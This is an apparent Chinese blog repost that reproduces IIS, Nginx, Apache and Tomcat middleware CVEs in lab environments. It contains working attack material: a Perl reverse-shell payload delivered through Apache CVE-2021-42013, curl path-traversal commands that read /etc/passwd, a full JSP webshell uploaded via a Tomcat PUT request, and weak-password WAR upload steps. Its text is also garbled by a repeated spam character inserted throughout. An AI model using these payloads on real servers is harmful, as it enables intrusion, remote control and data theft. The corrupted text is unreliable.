中间件解析漏洞的原因(中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现)

wufei123 发布于 2023-11-14 阅读(534)

菜鸟教程php在线编辑器

文章目录中间件-IIS安全问题中间件-Nginx安全问题漏洞复现中间件-Apache-RCE&目录遍历&文件解析等安全问题漏洞复现漏洞复现中间件-Tomcat安全问题-弱口令&游戏文件上传&文件包含等漏洞复现

漏洞复现中间件安全&CVE复现&IIS&Apache&Tomcat&Nginx漏洞复现中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,We游戏blogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQ游戏uery等

1、中间件-IIS-短文件&解析&蓝屏等2、中间件-Nginx-文件解析&命令执行等3、中间件-Apache-RCE&目录遍历&文件解析等4、中间件-Tomcat-弱口令&文件上传&文件包含游戏等中间件-IIS安全问题

中间件-IIS-短文件&解析&蓝屏等安全问题:1、短文件:信息收集2、文件解析3、HTTP.SYS:蓝屏崩溃,略有破坏性4、CVE-2017-7269 条件比较老旧中间件-Ng游戏inx安全问题Nginx详解

Nginx是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like 协议下发行其特点是占有内存少,并发能力强,事实上ngin游戏x的并发能力在同类型的网页服务器中表现较好。

中间件-Nginx-文件解析&命令执行等安全问题:1、后缀解析 文件名解析 配置不当:该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞 C游戏VE-2013-4547:影响版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7。

2、CVE_2021_23017相关文章:CVE_2021_230173、CVE_2017游戏_7529相关文章:CVE_2017_7529漏洞复现Nginx 解析漏洞复现靶场:vulhub参考:nginx解析漏洞复现

开启环境:

访问:

上传:上传一个正常的图片,图片当中带着我们的php语句

访问图游戏片,在图片后面加上/.php语句被成功解析并执行:

可利用此来上传木马,从而进行getshellNginx 文件名逻辑漏洞漏洞原理:主要原因是错误地解析了请求的URI,错误地获取到用户请求的文件名,导致游戏出现权限绕过、代码执行的连带影响靶场:vulhub参考:CVE-2013-4547

开启环境:

访问:

上传.gif文件这个环境是黑名单验证,我们无法上传php后缀的文件。我们上传一个“1.gif ”,注意游戏后面的空格:

访问http://your-ip:8080/uploadfiles/3.gif[0x20][0x00].php,即可发现php已被解析执行:

修改16进制数值:

解析执行:

同理利用该漏洞,上传游戏木马,可getshell中间件-Apache-RCE&目录遍历&文件解析等安全问题漏洞复现详解:Apache详解Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件它可以运行在几乎所有广泛游戏使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。

它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中安全问题:1、CVE_202游戏1_42013 RCE代码执行2、CVE_2021_41773 目录穿越3、CVE-2017-15715 文件解析

漏洞复现CVE_2021_42013 RCE代码执行(Apache RCE)描述:Ap游戏ache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50游戏 中针对 CVE-2021-41773 的修复不够充分。

攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,游戏则这些请求可能会成功如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。

此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本靶场:vulfocus游戏开启靶场:

访问:

payload://修改请求方式为POSTPOST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh//数据包内容为:echo;p游戏erl -e use Socket;$i="192.168.100.1";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(游戏connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");ex游戏ec("sh -i");};

//完整数据包:POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh HTTP/1.1Host: 192.168游戏.100.134:11559User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0

A游戏ccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.游戏8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, brDNT: 1Connection: closeUpgrade-Insecure-Requ游戏ests: 1Content-Type: application/x-www-form-urlencoded

Content-Length: 222echo;perl -e use Socket;$i=游戏"192.168.100.1";$p=8888;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in游戏($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};

反弹shell游戏命令:echo;perl -e use Socket;$i="攻击者ip";$p=监听端口;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if游戏(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");e游戏xec("sh -i");};

开启监听nc -lvvp 8888发送数据包,等待过后,成功反弹:

执行命令:

CVE_2021_41773 目录穿越(Apache目录遍历)Apache HTTP 服务器项游戏目旨在为包括 UNIX 和 Windows 在内的现代操作系统开发和维护开源 HTTP 服务器在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现一个缺陷。

攻击者可以游戏使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可以成功如果还为这些别名路径启用了 CGI 脚本,则可能允许远程执行游戏代码。

靶场:vulhub或vulfocus参考:[Apache HTTP 服务器 2.4.49 中的路径遍历和文件泄露漏洞](Vulhub - 用于漏洞环境的 Docker-Compose 文件)开启游戏环境:

访问界面:

在vulfocus当中开启靶场环境,访问界面:

访问:

payload://抓包,发送以下请求数据内容GET /icons/.%%32%65/%%32%65%%32%65/%%32%65%游戏%32%65/%%32%65%%32%65/etc/passwd HTTP/1.1

...

一个简单的 curl 命令来重现漏洞(请注意,必须是现有目录):/icons/payload:查看/etc/pa游戏sswd文件curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd

查看/etc/grou游戏p文件curl -v --path-as-is http://your-ip:8080/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/group

已成功披露:/etc/pass游戏wd

已成功披露:/etc/group命令执行RCE:payload:curl -v --data "echo;id" http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2游戏e/.%2e/bin/sh

curl -v --data "echo;ls" http://your-ip:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh

成功回显查看目录游戏

CVE-2017-15715 文件解析(Apache HTTPD 换行解析漏洞)Apache HTTPD是一款HTTP服务器其2.4.0~2.4.29版本存在一个解析漏洞,在解析PHP时,1.php游戏\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。

环境:vulhub漏洞复现详解:Apache HTTPD 换行解析漏洞(CVE-2017-15715)中间件-Tomcat安全问题-弱游戏口令&文件上传&文件包含等漏洞复现描述:Tomcat详解Tomcat是Apache软件基金会(Apache Software Foundation)的Jakarta项目中的一个核心项目,由Apache游戏、Sun 和其他一些公司及个人共同开发而成。

由于有了Sun 的参与和支持,最新的Servlet 和JSP规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP游戏 2.0 规范因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java爱好者的喜爱并得到了部分软件开发商的认可,成为比较流行的Web 应用服务器。

安全问题:1、Tomcat弱口令2、Tomca游戏t文件上传3、Tomcat文件包含漏洞复现Tomcat弱口令靶场:vulfocus开启环境:

访问:

点击管理后台应用,尝试弱口令

尝试账号和密码为:tomcat和tomcat(也可以使用burp进行爆破)游戏弱口令成功进入后台:

可使用哥斯拉生成jsp后门,打包压缩成zip,然后重命名为war后缀文件,进行上传,即可getshell

修改后,进行上传

进入后台,然后进行上传该文件:

输入账号密码后,成功上传:

点击游戏进入目录,访问后门:

尝试连接:成功连接并进入

后面文件以及目录:

Tomcat文件上传(CVE-2017-12615)漏洞介绍:描述:Tomcat 是一个小型的轻量级应用服务器,在中小型系统和并发访问用户游戏不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 的webshell文件,JSP文件中的恶意代码将能被服务器执游戏行,导致服务器上的数据泄露或获取服务器权限。

当存在漏洞的Tomcat运行在Windows/Linux主机上, 且启用了HTTP PUT请求方法( 例如, 将readonly初始化参数由默认值设置为fa游戏lse) , 攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的JSP的webshell文件,JSP文件中的恶意代码将能被服务器执行, 导致服务器上的数据泄露或获取服务器权限。

影响游戏版本:Apache Tomcat 7.0.0 - 7.0.79靶场:vulfocus开启靶场:

访问:

进行上传,上传一个1.jsp文件,抓取数据包,修改数据包内容,将后面内容写在请求体当中PUT /1.游戏jsp/ HTTP/1.1Host: 192.168.100.134:64009User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Ge游戏cko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Acce游戏pt-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate, brCookie: JSESSIONID游戏=71F2B8B297CF95B8EDC83C14222858FADNT: 1Connection: close

Upgrade-Insecure-Requests: 1Content-Type: ap游戏plication/x-www-form-urlencodedContent-Length: 2617<%try{byte[] data=base64Decode(request.getParamet游戏er(pass));data=x(data, false);if (session.getAttribute("payload")==null){session.setAttribute("paylo游戏ad",new X(this.getClass().getClassLoader()).Q(data));}else{request.setAttribute("parameters",data);j游戏ava.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.get游戏Attribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().writ游戏e(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), 游戏true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}

%>jsp后门代码:<%try{byte[]游戏 data=base64Decode(request.getParameter(pass));data=x(data, false);if (session.getAttribute("payload游戏")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}else{requ游戏est.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutput游戏Stream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(p游戏ageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(游戏base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch 游戏(Exception e){}

%>发送数据包即可:上传1.jsp文件

修改完成后,发送数据包即可:

回到界面,尝试访问:

上传成功,使用哥斯拉进行连接,getshell

修复方案:1、配置readonly和V游戏irtualDirContext值为True或注释参数,禁止使用PUT方法并重启tomcat注意:如果禁用PUT方法,对于依赖PUT方法的应用,可能导致业务失效2、根据官方补丁升级最新版本

Tomcat游戏文件包含(CVE-2020-1938)描述:Apache Tomcat AJP协议(默认8009端口)由于存在实现缺陷导致相关参数可控,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp目录下游戏的任意文件。

若服务器端同时存在文件上传功能,攻击者可进一步结合文件包含实现远程代码的执行影响版本:Tomcat 6.Tomcat 7.< 7.0.100Tomcat 8.* < 8.5.51Tomca游戏t 9.* < 9.0.31

靶场:vulfocus开启环境:

访问界面:

Tomcat-Ajp协议文件读取漏洞自动化脚本CNVD-2020-10487-Tomcat-Ajp-lfipython2 CNVD游戏-2020-10487-Tomcat-Ajp-lfi.py you-ip -p AJP协议(默认端口8009)端口 -f WEB-INF/web.xml //读取的文件路径

// -p 对应的端口// 游戏-f 参数选择要包含的文件

执行结果:

修复加固方法:将tomcat升级到9.0.31、8.5.51或者7.0.100版本禁止使用AJP协议配置secret来设置AJP协议的认证凭证Tomcat 反序列化游戏 (CVE-2020-9484)Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器。

成功利用此漏洞需要同时满足以下4个条件: 1.攻击者能够控制服务器上游戏文件的内容和文件名称; 2.服务器PersistenceManager配置中使用了FileStore; 3.PersistenceManager中的sessionAttributeValueClass游戏NameFilter被配置为“null”,或者过滤器不够严格,导致允许攻击者提供反序列化数据的对象;

4.攻击者知道使用的FileStore存储位置到攻击者可控文件的相对路径该漏洞利用条件较为苛刻,可升游戏级版本进行防护本文作者:rumilc,转载请注明来自FreeBuf.COM【Hacking黑白红】,一线渗透攻防实战交流公众号。

回复“电子书”获取web渗透、CTF电子书:回复“视频教程”获取渗透测试游戏视频教程;  回复“内网书籍”获取内网学习书籍;        回复“CTF工具”获取渗透、CTF全套工具;回复“内网渗透”;获取内网渗透资料;

回复“护网”;获取护网学习资料 ;回复“python”,游戏获取python视频教程;回复“java”,获取Java视频教程;回复“go”,获取go视频教程知识星球【Hacking藏经阁】知识星球致力于分享

技术和认知1、技术方面主攻渗透测试(web和内网)、C游戏TF比赛、逆向、护网行动等;400G渗透教学视频、80多本安全类电子书、50个渗透靶场(资料主要来自本人总结、以及学习过程中购买的课程)2、认知方面。

副业经营、人设IP打造,具体点公众号运营、抖*yi游戏n等自媒体运营(目前主要在运营两个平台4个号)如果你也想像我一样,不想35岁以后被动的去面试,那么加入星球我们一起成长欢迎加入99米/年,平均每天2毛7分

钱,学习网络安全一整年。

渗透实战系列▶【渗透实游戏战系列】51|- 一次BC站点的GetShell过程▶【渗透实战系列】50|- Log4j打点后与管理员斗智斗勇▶【渗透实战系列】49|-实战某高校的一次挖矿病毒的应急处置▶【渗透实战系列】|48-一游戏次内网渗透

▶【渗透实战系列】|47-记一次对某鱼骗子卖家的溯源▶【渗透实战系列】|46-渗透测试:从Web到内网▶【渗透实战系列】|45-记一次渗透实战-代码审计到getshell▶【渗透实战系列】|游戏44-记一次授权渗透实战(过程曲折,Java getshell)

▶【渗透实战系列】|43-某次通用型漏洞挖掘思路分享▶【渗透实战系列】|42-防范诈骗,记一次帮助粉丝渗透黑入某盘诈骗的实战▶【渗透实战游戏系列】|41-记一次色*情app渗透测试▶【渗透实战系列】|40-APP渗透测试步骤(环境、代理、抓包挖洞)

▶【渗透实战系列】|39-BC渗透的常见切入点(总结)▶【渗透实战系列】|38-对某色情直播游戏渗透▶【渗透实战系列】|37-6年级小学生把学校的网站给搞了!▶【渗透实战系列】|36-一次bc推广渗透实战▶

【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透▶【渗透实战系列】|34-如何游戏用渗透思路分析网贷诈骗链▶【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP▶【渗透实战系列】|32-FOFA寻找漏洞,绕过杀软拿下目标站

▶【渗透实战系列】|31-记一次游戏对学校的渗透测试▶【渗透实战系列】|30-从SQL注入渗透内网(渗透的本质就是信息搜集)▶【渗透实战系列】|29-实战|对某勒索APP的Getshell▶【渗透实战系列】|28-我是如何拿下BC站的服游戏务器

▶【渗透实战系列】|27-对钓鱼诈骗网站的渗透测试(成功获取管理员真实IP)▶【渗透实战系列】|26一记某cms审计过程(步骤详细)▶【渗透实战系列】|25一次从 APP 逆向到 Getshell游戏 的过程

▶【渗透实战系列】|24-针对CMS的SQL注入漏洞的代码审计思路和方法▶【渗透实战系列】|23-某菠菜网站渗透实战▶【渗透实战系列】|22-渗透系列之打击彩票站▶【渗透实战系列】|21一次理游戏财杀猪盘渗透测试案例

▶【渗透实战系列】|20-渗透直播网站▶【渗透实战系列】|19-杀猪盘渗透测试▶【渗透实战系列】|18-手动拿学校站点 得到上万人的信息(漏洞已提交)▶【渗透实战系列】|17-巧用游戏fofa对目标网站进行getshell

▶【渗透实战系列】|16-裸聊APP渗透测试▶【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点▶【渗透实战系列】|14-对诈骗(杀猪盘)网站的渗透测试▶游戏【渗透实战系列】|13-waf绕过拿下赌博网站

▶【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局▶【渗透实战系列】|11 - 赌博站人人得而诛之▶【渗透实战系列】|10 - 记某色X商游戏城支付逻辑漏洞的白嫖(修改价格提交订单)▶【渗透实战系列】|9-对境外网站开展的一次web渗透测试(非常详细,适合打战练手)

▶【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到游戏无语)▶【渗透实战系列】|7-记一次理财杀猪盘渗透测试案例▶【渗透实战系列】|6- BC杀猪盘渗透一条龙▶【渗透实战系列】|5-记一次内衣网站渗透测试

▶【渗透实战系列】|4-看我如何拿下BC站的服务器游戏▶【渗透实战系列】|3-一次简单的渗透▶【渗透实战系列】|2-记一次后门爆破到提权实战案例▶【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)

长按-识别-关注

Hac游戏king黑白红一个专注信息安全技术的学习平台

点分享

点收藏

点点赞

点在看

亲爱的读者们,感谢您花时间阅读本文。如果您对本文有任何疑问或建议,请随时联系我。我非常乐意与您交流。

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

河南中青旅行社综合资讯 奇遇综合资讯 盛世蓟州综合资讯 综合资讯 游戏百科综合资讯 新闻97685